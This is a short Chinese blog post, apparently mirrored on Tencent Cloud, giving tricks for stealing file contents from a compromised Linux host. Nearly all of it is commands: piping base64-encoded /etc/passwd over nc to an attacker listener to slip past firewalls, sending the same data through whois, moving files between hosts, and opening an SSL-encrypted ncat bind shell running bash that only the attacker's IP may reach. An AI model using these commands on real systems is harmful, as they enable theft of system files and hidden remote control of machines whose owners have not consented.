前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >nc加密盗取文件内容的小技巧

nc加密盗取文件内容的小技巧

作者头像
网e渗透安全部
发布2022-12-01 15:34:17
6160
发布2022-12-01 15:34:17
举报
文章被收录于专栏:白安全组

这里简单介绍一下,情况是这样

我们入侵Linux之后,植入nc后,想盗取部分内容无法直接传输,因为会遇到防火墙的拦截,这里就需要进行加密传输。

黑客端:

代码语言:javascript
复制
nc -l -p 8889 > kali.txt

受害端Linux系统:

代码语言:javascript
复制
cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1

然后黑客端的nc目录下会生成一个kali.txt,里面存放了base64加密之后的passwd内容

传输文件:

控制端:

代码语言:javascript
复制
    nc -l -p 8889 > poc.py

被控端:

代码语言:javascript
复制
    nc -nv 10.0.79.241 8889 < ./poc.py -q 1

传输的文件接收的时候命名最好是一样的

文件基本不会被防火墙拦截

在两台都是Linux的情况下,目标机器无法上传nc,可以利用whois的命令来完成

黑客机器:

代码语言:javascript
复制
nc -l -v -p 8889 |sed "s/ //g" | base64 -d

目标机器:

代码语言:javascript
复制
 whois -h [黑客IP] -p 8889 `cat /etc/passwd | base64 `

两台都是linux,并且要加密通信

nc的加密版ncat

目标:

代码语言:javascript
复制
ncat -c bash --allow [黑客ip] -vnl 3333 --ssl 

只允许黑客的ip去控制它

黑客:

代码语言:javascript
复制
nc -nv [目标ip] 3333 --ssl

这样我们的一个命令传输过程就是完全加密了的。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-11-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档